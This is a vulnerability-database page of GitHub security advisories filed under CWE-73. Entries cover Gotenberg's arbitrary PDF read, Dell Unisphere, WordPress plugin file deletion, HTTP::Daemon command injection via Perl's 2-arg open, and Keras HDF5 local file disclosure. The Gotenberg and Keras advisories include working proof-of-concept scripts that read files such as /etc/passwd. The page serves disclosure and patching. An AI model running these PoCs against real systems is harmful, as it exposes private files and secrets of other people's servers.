Common Weakness Enumeration

CWE-73

Allowed

External Control of File Name or Path

Abstraction: Base · Status: Draft

The product allows user input to control or influence paths or file names that are used in filesystem operations.

914 vulnerabilities reference this CWE, most recent first.

GHSA-3CV5-Q585-H563

Vulnerability from github – Published: 2026-05-07 00:59 – Updated: 2026-05-14 20:52
VLAI
Summary
Gotenberg has arbitrary PDF read via stampExpression and watermarkExpression in merge, split, and convert routes
Details

Summary

Six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown) accept stampSource=pdf + stampExpression=/path and watermarkSource=pdf + watermarkExpression=/path from anonymous callers. The dedicated stamp/watermark routes require an uploaded file when the source type is image or pdf; these six routes only overwrite the expression when a file is uploaded, leaving the user-controlled path intact when no file is attached. pdfcpu opens the path and composites its pages onto the output PDF, which returns to the caller. An attacker reads any PDF the Gotenberg process can access on the container filesystem.

Details

The dedicated stamp route at pkg/modules/pdfengines/routes.go:1322-1332 rejects requests missing the stamp file:

if stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {
    if stampFile == "" {
        return api.WrapError(errors.New("no stamp file provided"), ...)
    }
    stamp.Expression = stampFile
}

The merge, split, LibreOffice, and Chromium routes use a lax pattern across twelve call sites (six stamp + six watermark):

// pkg/modules/pdfengines/routes.go:679-683 (merge), 803 (split);
// pkg/modules/libreoffice/routes.go:307-311;
// pkg/modules/chromium/routes.go:433-438, 508-513, 592-597
if (stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF) && stampFile != "" {
    stamp.Expression = stampFile
}
if (watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF) && watermarkFile != "" {
    watermark.Expression = watermarkFile
}

When stampFile == "" (no file attached to the stamp form field), the guard short-circuits and stamp.Expression keeps the raw user-supplied stampExpression form string. The same pattern applies to watermarkFile/watermarkExpression.

pkg/modules/pdfcpu/pdfcpu.go:635 forwards the expression straight to the pdfcpu CLI:

args := []string{"stamp", "add", "-mode", "pdf", "--", stamp.Expression, onDesc, inputPath, outputPath}
cmd, err := gotenberg.CommandContext(ctx, logger, cfg.BinPath, args...)

pdfcpu reads the target PDF at that path and composites its pages as a stamp on every page of the merged output.

Proof of Concept

Reproduction on the stock Docker image. The scenario models a deployment that mounts host paths into the container (common for document-processing pipelines) or where another request leaves a PDF in the shared /tmp filesystem:

docker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8
docker exec gotenberg-poc sh -c 'cat > /tmp/victim_doc.pdf' < victim.pdf

Where victim.pdf contains extractable text such as BOB-CONFIDENTIAL-CONTRACT-2026-04-20.

Alice attacks without auth:

import requests, io, subprocess
T = "http://localhost:3000"

minimal = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
           b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
           b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n"
           b"xref\n0 4\n0000000000 65535 f \n0000000009 00000 n \n"
           b"0000000058 00000 n \n0000000115 00000 n \n"
           b"trailer\n<< /Size 4 /Root 1 0 R >>\nstartxref\n180\n%%EOF\n")

r = requests.post(
    f"{T}/forms/pdfengines/merge",
    files={"file1": ("a.pdf", io.BytesIO(minimal), "application/pdf"),
           "file2": ("b.pdf", io.BytesIO(minimal), "application/pdf")},
    data={"stampSource": "pdf", "stampExpression": "/tmp/victim_doc.pdf"},
    timeout=30,
)
print(f"HTTP {r.status_code} bytes={len(r.content)}")
open("/tmp/out.pdf", "wb").write(r.content)
print(subprocess.run(["pdftotext", "/tmp/out.pdf", "-"],
                     capture_output=True, text=True).stdout)

Observed output against gotenberg 8.31.0:

HTTP 200 bytes=1852
BOB-CONFIDENTIAL-CONTRACT-2026-04-20
...

Non-PDF targets via stampSource=pdf (for example /etc/hostname) return HTTP 500 after pdfcpu fails to parse the file as PDF, which acts as a file-existence oracle. stampSource=image with non-image files returns HTTP 400 (image parsing rejects it). The same PoC applies with stampSource replaced by watermarkSource and stampExpression by watermarkExpression.

Impact

Any anonymous caller with access to port 3000 reads PDF files from any path the Gotenberg process can open. In the default Docker image with no volume mounts, the reachable set is limited to /tmp/<gotenberg-work-uuid>/<request-uuid>/*.pdf (files staged during another in-flight request) and any PDF files the base image happens to ship. In deployments that bind-mount host directories into the container (document processing pipelines, shared storage for Office document conversion), the attacker reads arbitrary PDF files under those mount points. The file-existence oracle additionally lets the attacker probe for the presence of non-PDF files anywhere the process can read.

Recommended Fix

Apply the dedicated stamp route's guard to all six stamp call sites and all six watermark call sites:

if stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {
    if stampFile == "" {
        return api.WrapError(
            errors.New("no stamp file provided for image or pdf source"),
            api.NewSentinelHttpError(http.StatusBadRequest,
                "Invalid form data: a stamp file is required for image or pdf source"),
        )
    }
    stamp.Expression = stampFile
}
if watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF {
    if watermarkFile == "" {
        return api.WrapError(
            errors.New("no watermark file provided for image or pdf source"),
            api.NewSentinelHttpError(http.StatusBadRequest,
                "Invalid form data: a watermark file is required for image or pdf source"),
        )
    }
    watermark.Expression = watermarkFile
}

Call sites: pkg/modules/pdfengines/routes.go:679-683 (merge), :803-807 (split), pkg/modules/libreoffice/routes.go:307-311, pkg/modules/chromium/routes.go:433-438 (url), :508-513 (html), :592-597 (markdown), plus each route's watermark counterpart.


Found by aisafe.io

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gotenberg/gotenberg/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "8.31.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42593"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T00:59:50Z",
    "nvd_published_at": "2026-05-14T16:16:22Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nSix conversion routes (`pdfengines/merge`, `pdfengines/split`, `libreoffice/convert`, `chromium/convert/url`, `chromium/convert/html`, `chromium/convert/markdown`) accept `stampSource=pdf` + `stampExpression=/path` and `watermarkSource=pdf` + `watermarkExpression=/path` from anonymous callers. The dedicated stamp/watermark routes require an uploaded file when the source type is image or pdf; these six routes only overwrite the expression when a file is uploaded, leaving the user-controlled path intact when no file is attached. pdfcpu opens the path and composites its pages onto the output PDF, which returns to the caller. An attacker reads any PDF the Gotenberg process can access on the container filesystem.\n\n## Details\n\nThe dedicated stamp route at `pkg/modules/pdfengines/routes.go:1322-1332` rejects requests missing the stamp file:\n\n```go\nif stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {\n    if stampFile == \"\" {\n        return api.WrapError(errors.New(\"no stamp file provided\"), ...)\n    }\n    stamp.Expression = stampFile\n}\n```\n\nThe merge, split, LibreOffice, and Chromium routes use a lax pattern across twelve call sites (six stamp + six watermark):\n\n```go\n// pkg/modules/pdfengines/routes.go:679-683 (merge), 803 (split);\n// pkg/modules/libreoffice/routes.go:307-311;\n// pkg/modules/chromium/routes.go:433-438, 508-513, 592-597\nif (stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF) \u0026\u0026 stampFile != \"\" {\n    stamp.Expression = stampFile\n}\nif (watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF) \u0026\u0026 watermarkFile != \"\" {\n    watermark.Expression = watermarkFile\n}\n```\n\nWhen `stampFile == \"\"` (no file attached to the `stamp` form field), the guard short-circuits and `stamp.Expression` keeps the raw user-supplied `stampExpression` form string. The same pattern applies to `watermarkFile`/`watermarkExpression`.\n\n`pkg/modules/pdfcpu/pdfcpu.go:635` forwards the expression straight to the pdfcpu CLI:\n\n```go\nargs := []string{\"stamp\", \"add\", \"-mode\", \"pdf\", \"--\", stamp.Expression, onDesc, inputPath, outputPath}\ncmd, err := gotenberg.CommandContext(ctx, logger, cfg.BinPath, args...)\n```\n\npdfcpu reads the target PDF at that path and composites its pages as a stamp on every page of the merged output.\n\n## Proof of Concept\n\nReproduction on the stock Docker image. The scenario models a deployment that mounts host paths into the container (common for document-processing pipelines) or where another request leaves a PDF in the shared `/tmp` filesystem:\n\n```bash\ndocker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8\ndocker exec gotenberg-poc sh -c \u0027cat \u003e /tmp/victim_doc.pdf\u0027 \u003c victim.pdf\n```\n\nWhere `victim.pdf` contains extractable text such as `BOB-CONFIDENTIAL-CONTRACT-2026-04-20`.\n\nAlice attacks without auth:\n\n```python\nimport requests, io, subprocess\nT = \"http://localhost:3000\"\n\nminimal = (b\"%PDF-1.4\\n1 0 obj\\n\u003c\u003c /Type /Catalog /Pages 2 0 R \u003e\u003e\\nendobj\\n\"\n           b\"2 0 obj\\n\u003c\u003c /Type /Pages /Kids [3 0 R] /Count 1 \u003e\u003e\\nendobj\\n\"\n           b\"3 0 obj\\n\u003c\u003c /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] \u003e\u003e\\nendobj\\n\"\n           b\"xref\\n0 4\\n0000000000 65535 f \\n0000000009 00000 n \\n\"\n           b\"0000000058 00000 n \\n0000000115 00000 n \\n\"\n           b\"trailer\\n\u003c\u003c /Size 4 /Root 1 0 R \u003e\u003e\\nstartxref\\n180\\n%%EOF\\n\")\n\nr = requests.post(\n    f\"{T}/forms/pdfengines/merge\",\n    files={\"file1\": (\"a.pdf\", io.BytesIO(minimal), \"application/pdf\"),\n           \"file2\": (\"b.pdf\", io.BytesIO(minimal), \"application/pdf\")},\n    data={\"stampSource\": \"pdf\", \"stampExpression\": \"/tmp/victim_doc.pdf\"},\n    timeout=30,\n)\nprint(f\"HTTP {r.status_code} bytes={len(r.content)}\")\nopen(\"/tmp/out.pdf\", \"wb\").write(r.content)\nprint(subprocess.run([\"pdftotext\", \"/tmp/out.pdf\", \"-\"],\n                     capture_output=True, text=True).stdout)\n```\n\nObserved output against gotenberg 8.31.0:\n\n```\nHTTP 200 bytes=1852\nBOB-CONFIDENTIAL-CONTRACT-2026-04-20\n...\n```\n\nNon-PDF targets via `stampSource=pdf` (for example `/etc/hostname`) return HTTP 500 after pdfcpu fails to parse the file as PDF, which acts as a file-existence oracle. `stampSource=image` with non-image files returns HTTP 400 (image parsing rejects it). The same PoC applies with `stampSource` replaced by `watermarkSource` and `stampExpression` by `watermarkExpression`.\n\n## Impact\n\nAny anonymous caller with access to port 3000 reads PDF files from any path the Gotenberg process can open. In the default Docker image with no volume mounts, the reachable set is limited to `/tmp/\u003cgotenberg-work-uuid\u003e/\u003crequest-uuid\u003e/*.pdf` (files staged during another in-flight request) and any PDF files the base image happens to ship. In deployments that bind-mount host directories into the container (document processing pipelines, shared storage for Office document conversion), the attacker reads arbitrary PDF files under those mount points. The file-existence oracle additionally lets the attacker probe for the presence of non-PDF files anywhere the process can read.\n\n## Recommended Fix\n\nApply the dedicated stamp route\u0027s guard to all six stamp call sites and all six watermark call sites:\n\n```go\nif stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {\n    if stampFile == \"\" {\n        return api.WrapError(\n            errors.New(\"no stamp file provided for image or pdf source\"),\n            api.NewSentinelHttpError(http.StatusBadRequest,\n                \"Invalid form data: a stamp file is required for image or pdf source\"),\n        )\n    }\n    stamp.Expression = stampFile\n}\nif watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF {\n    if watermarkFile == \"\" {\n        return api.WrapError(\n            errors.New(\"no watermark file provided for image or pdf source\"),\n            api.NewSentinelHttpError(http.StatusBadRequest,\n                \"Invalid form data: a watermark file is required for image or pdf source\"),\n        )\n    }\n    watermark.Expression = watermarkFile\n}\n```\n\nCall sites: `pkg/modules/pdfengines/routes.go:679-683` (merge), `:803-807` (split), `pkg/modules/libreoffice/routes.go:307-311`, `pkg/modules/chromium/routes.go:433-438` (url), `:508-513` (html), `:592-597` (markdown), plus each route\u0027s watermark counterpart.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-3cv5-q585-h563",
  "modified": "2026-05-14T20:52:32Z",
  "published": "2026-05-07T00:59:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-3cv5-q585-h563"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42593"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gotenberg/gotenberg"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gotenberg has arbitrary PDF read via stampExpression and watermarkExpression in merge, split, and convert routes"
}

GHSA-3G9H-GC4R-R2PP

Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-19 18:31
VLAI
Details

Dell Unisphere for PowerMax, version(s) 10.2, contain(s) an External Control of File Name or Path vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-26361"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-19T09:16:25Z",
    "severity": "MODERATE"
  },
  "details": "Dell Unisphere for PowerMax, version(s) 10.2, contain(s) an External Control of File Name or Path vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.",
  "id": "GHSA-3g9h-gc4r-r2pp",
  "modified": "2026-02-19T18:31:53Z",
  "published": "2026-02-19T18:31:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26361"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000429268/dsa-2026-102-dell-unisphere-for-powermax-and-powermax-eem-security-update-for-multiple-vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3H64-FX5V-2F3Q

Vulnerability from github – Published: 2025-12-12 06:31 – Updated: 2026-04-08 18:34
VLAI
Details

The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP's filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the 'current_user_avatar' parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-13320"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-12T04:15:41Z",
    "severity": "MODERATE"
  },
  "details": "The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP\u0027s filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the \u0027current_user_avatar\u0027 parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled.",
  "id": "GHSA-3h64-fx5v-2f3q",
  "modified": "2026-04-08T18:34:00Z",
  "published": "2025-12-12T06:31:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13320"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L70"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L75"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L86"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L70"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L75"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L86"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3420956/wp-user-manager/trunk/includes/forms/trait-wpum-account.php"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8304bf-bec2-4fcf-9fe2-46b626b3dae9?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3HC6-3P33-WQ57

Vulnerability from github – Published: 2026-05-27 06:31 – Updated: 2026-07-07 12:31
VLAI
Details

HTTP::Daemon versions before 6.17 for Perl allow OS command injection via send_file().

send_file() opens its string argument with Perl's 2-arg open(). The 2-arg form interprets magic prefixes: '| cmd' and 'cmd |' open a pipe to a subprocess, '> path' and '>> path' open the path for write or append.

Untrusted input passed to send_file() can run OS commands at the daemon process UID. The read-pipe form ('cmd |') also leaks subprocess stdout into the HTTP response body. The write-mode forms can create or truncate files at attacker chosen paths.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-8450"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73",
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-27T05:16:23Z",
    "severity": "CRITICAL"
  },
  "details": "HTTP::Daemon versions before 6.17 for Perl allow OS command injection via send_file().\n\nsend_file() opens its string argument with Perl\u0027s 2-arg open(). The 2-arg form interprets magic prefixes: \u0027| cmd\u0027 and \u0027cmd |\u0027 open a pipe to a subprocess, \u0027\u003e path\u0027 and \u0027\u003e\u003e path\u0027 open the path for write or append.\n\nUntrusted input passed to send_file() can run OS commands at the daemon process UID. The read-pipe form (\u0027cmd |\u0027) also leaks subprocess stdout into the HTTP response body. The write-mode forms can create or truncate files at attacker chosen paths.",
  "id": "GHSA-3hc6-3p33-wq57",
  "modified": "2026-07-07T12:31:29Z",
  "published": "2026-05-27T06:31:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8450"
    },
    {
      "type": "WEB",
      "url": "https://github.com/libwww-perl/HTTP-Daemon/pull/89"
    },
    {
      "type": "WEB",
      "url": "https://github.com/libwww-perl/HTTP-Daemon/commit/945d35141d94490f749640bd4390acd6a2193995.patch"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36187"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36188"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36189"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2026-8450"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481773"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2026/06/msg00028.html"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/OALDERS/HTTP-Daemon-6.17/changes"
    },
    {
      "type": "WEB",
      "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-8450.json"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/05/27/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3HHQ-XM5H-WCVH

Vulnerability from github – Published: 2022-09-07 00:01 – Updated: 2025-03-21 18:31
VLAI
Details

The Download Manager plugin for WordPress is vulnerable to arbitrary file deletion in versions up to, and including 3.2.50. This is due to insufficient file type and path validation on the deleteFiles() function found in the ~/Admin/Menu/Packages.php file that triggers upon download post deletion. This makes it possible for contributor level users and above to supply an arbitrary file path via the 'file[files]' parameter when creating a download post and once the user deletes the post the supplied arbitrary file will be deleted. This can be used by attackers to delete the /wp-config.php file which will reset the installation and make it possible for an attacker to achieve remote code execution on the server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-2431"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-610",
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-06T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "The Download Manager plugin for WordPress is vulnerable to arbitrary file deletion in versions up to, and including 3.2.50. This is due to insufficient file type and path validation on the deleteFiles() function found in the ~/Admin/Menu/Packages.php file that triggers upon download post deletion. This makes it possible for contributor level users and above to supply an arbitrary file path via the \u0027file[files]\u0027 parameter when creating a download post and once the user deletes the post the supplied arbitrary file will be deleted. This can be used by attackers to delete the /wp-config.php file which will reset the installation and make it possible for an attacker to achieve remote code execution on the server.",
  "id": "GHSA-3hhq-xm5h-wcvh",
  "modified": "2025-03-21T18:31:19Z",
  "published": "2022-09-07T00:01:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2431"
    },
    {
      "type": "WEB",
      "url": "https://packetstormsecurity.com/files/167920/wpdownloadmanager3250-filedelete.txt"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=2762092%40download-manager\u0026new=2762092%40download-manager\u0026sfp_email=\u0026sfph_mail="
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/blog/2022/08/high-severity-vulnerability-patched-in-download-manager-plugin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3M4Q-JMJ6-R34Q

Vulnerability from github – Published: 2026-02-18 22:41 – Updated: 2026-02-18 22:41
VLAI
Summary
Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading
Details

Summary

TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).

Impact

  • Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
  • What leaks: Contents of any readable file on the host (e.g., /etc/hosts, /etc/passwd, /etc/hostname).
  • Visibility: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.
  • Prerequisites: Victim executes model.load_weights() or tf.keras.models.load_model() on an attacker-supplied HDF5 weights file or .keras archive.
  • Scope: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.

Attacker Scenario

  1. Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
  2. Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., /home/<user>/.ssh/id_rsa, /etc/shadow if readable, configuration files containing API keys, etc.).
  3. Execution: The victim calls model.load_weights() (or tf.keras.models.load_model() for .keras archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.
  4. Exfiltration vectors:
  5. Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
  6. Re-saving the model (weights or .keras archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.
  7. If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.

Additional Preconditions

  • The target file must exist and be readable by the process running TensorFlow/Keras.
  • Safe mode (load_model(..., safe_mode=True)) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.
  • Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to /etc/hostname) can reduce impact, but common defaults expose a broad set of host files.

Environment Used for Verification (2025‑10‑19)

  • OS: Debian-based container running Python 3.11.
  • Packages (installed via python -m pip install -U ...):
  • tensorflow==2.20.0
  • keras==3.11.3
  • h5py==3.15.1
  • numpy==2.3.4
  • Tooling: strace (for syscall tracing), pip upgraded to latest before installs.
  • Debug flags: PYTHONFAULTHANDLER=1, TF_CPP_MIN_LOG_LEVEL=0 during instrumentation to capture verbose logs if needed.

Reproduction Instructions (Weights-Only PoC)

  1. Ensure the environment above (or equivalent) is prepared.
  2. Save the following script as weights_external_demo.py:
from __future__ import annotations
import os
from pathlib import Path
import numpy as np
import tensorflow as tf
import h5py

def choose_host_file() -> Path:
    candidates = [
        os.environ.get("KFLI_PATH"),
        "/etc/machine-id",
        "/etc/hostname",
        "/proc/sys/kernel/hostname",
        "/etc/passwd",
    ]
    for candidate in candidates:
        if not candidate:
            continue
        path = Path(candidate)
        if path.exists() and path.is_file():
            return path
    raise FileNotFoundError("set KFLI_PATH to a readable file")

def build_model(units: int) -> tf.keras.Model:
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(1,), name="input"),
        tf.keras.layers.Dense(units, activation=None, use_bias=True, name="dense"),
    ])
    model(tf.zeros((1, 1)))  # build weights
    return model

def find_bias_dataset(h5file: h5py.File) -> str:
    matches: list[str] = []
    def visit(name: str, obj) -> None:
        if isinstance(obj, h5py.Dataset) and name.endswith("bias:0"):
            matches.append(name)
    h5file.visititems(visit)
    if not matches:
        raise RuntimeError("bias dataset not found")
    return matches[0]

def rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:
    with h5py.File(path, "r+") as h5file:
        bias_path = find_bias_dataset(h5file)
        parent = h5file[str(Path(bias_path).parent)]
        dset_name = Path(bias_path).name
        del parent[dset_name]
        max_bytes = 128
        size = host_file.stat().st_size
        nbytes = min(size, max_bytes)
        nbytes = (nbytes // 4) * 4 or 32  # multiple of 4 for float32 packing
        units = max(1, nbytes // 4)
        parent.create_dataset(
            dset_name,
            shape=(units,),
            dtype="float32",
            external=[(host_file.as_posix(), 0, nbytes)],
        )
        return units, nbytes

def floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:
    raw = np.ascontiguousarray(arr).view(np.uint8)
    ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode("ascii", "ignore")
    hex_preview = raw[:64].tobytes().hex()
    return ascii_preview, hex_preview

def main() -> None:
    host_file = choose_host_file()
    model = build_model(units=32)

    weights_path = Path("weights_demo.h5")
    model.save_weights(weights_path.as_posix())

    units, nbytes = rewrite_bias_external(weights_path, host_file)
    print("secret_text_source", host_file)
    print("units", units, "bytes_mapped", nbytes)

    model.load_weights(weights_path.as_posix())
    output = model.predict(tf.zeros((1, 1)), verbose=0)[0]
    ascii_preview, hex_preview = floats_to_ascii(output)
    print("recovered_ascii", ascii_preview)
    print("recovered_hex64", hex_preview)

    saved = Path("weights_demo_resaved.h5")
    model.save_weights(saved.as_posix())
    print("resaved_weights", saved.as_posix())

if __name__ == "__main__":
    main()
  1. Execute python weights_external_demo.py.
  2. Observe:
  3. secret_text_source prints the chosen host file path.
  4. recovered_ascii/recovered_hex64 display the file contents recovered via model inference.
  5. A re-saved weights file contains the leaked bytes inside the artifact.

Expanded Validation (Multiple Attack Scenarios)

The following test harness generalises the attack for multiple HDF5 constructs:

  • Build a minimal feed-forward model and baseline weights.
  • Create three malicious variants:
  • External storage dataset: dataset references /etc/hosts.
  • External link: ExternalLink pointing at /etc/passwd.
  • Indirect link: external storage referencing a helper HDF5 that, in turn, refers to /etc/hostname.
  • Run each scenario under strace -f -e trace=open,openat,read while calling model.load_weights(...).
  • Post-process traces and weight tensors to show the exact bytes loaded.

Relevant syscall excerpts captured during the run:

openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 7
read(7, "127.0.0.1 localhost\n", 64) = 21
...
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 9
read(9, "root:x:0:0:root:/root:/bin/bash\n", 64) = 32
...
openat(AT_FDCWD, "/etc/hostname", O_RDONLY|O_CLOEXEC) = 8
read(8, "example-host\n", 64) = 13

The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.

Recommended Product Fix

  1. Default-deny external datasets/links:
  2. Inspect creation property lists (get_external_count) before materialising tensors.
  3. Resolve SoftLink / ExternalLink targets and block if they leave the HDF5 file.
  4. Provide an escape hatch:
  5. Offer an explicit allow_external_data=True flag or environment variable for advanced users who truly rely on HDF5 external storage.
  6. Documentation:
  7. Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
  8. Regression coverage:
